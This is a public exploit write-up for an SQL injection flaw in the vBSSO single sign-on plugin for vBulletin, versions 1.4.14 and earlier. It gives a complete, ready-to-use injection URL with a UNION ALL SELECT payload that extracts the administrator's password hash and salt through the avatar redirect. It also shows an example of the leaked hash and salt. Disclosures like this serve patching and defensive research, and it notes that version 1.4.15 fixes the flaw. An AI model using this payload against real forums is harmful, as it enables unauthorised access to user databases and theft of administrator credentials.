# Exploit Title: vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection
# Date: January 20, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517
# Version: <= 1.4.14, patched in >= 1.4.15
This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file
in the fetchUserinfo function.
It requires a big UNION ALL SELECT query and commenting out the LIMIT
function of SQL. If SQL injection is a success, the browser will
redirect the user to a URL where the URL contains the extracted information.
To exploit this, you need to execute a rather large UNION ALL SELECT
query like this:
http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid =
1 UNION ALL SELECT userfield.*, usertextfield.*, user.*,
usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS
passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS
displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath,
NOT ISNULL(customavatar.userid) AS hascustomavatar,
customavatar.dateline AS avatardateline, customavatar.width AS avwidth,
customavatar.height AS avheight, customavatar.height_thumb AS
avheight_thumb, customavatar.width_thumb AS avwidth_thumb,
customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS
userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS
usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN
usertextfield AS usertextfield ON (usertextfield.userid = user.userid)
LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT
JOIN customavatar AS customavatar ON (customavatar.userid = user.userid)
WHERE user.userid = 1 ORDER BY avatarpath DESC%23
For example, by visiting this URL on a vulnerable forum, you will be
redirected to
http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X’+3cYkq9Z4Cd3WS
which obviously contains the hash and salt of userid 1.
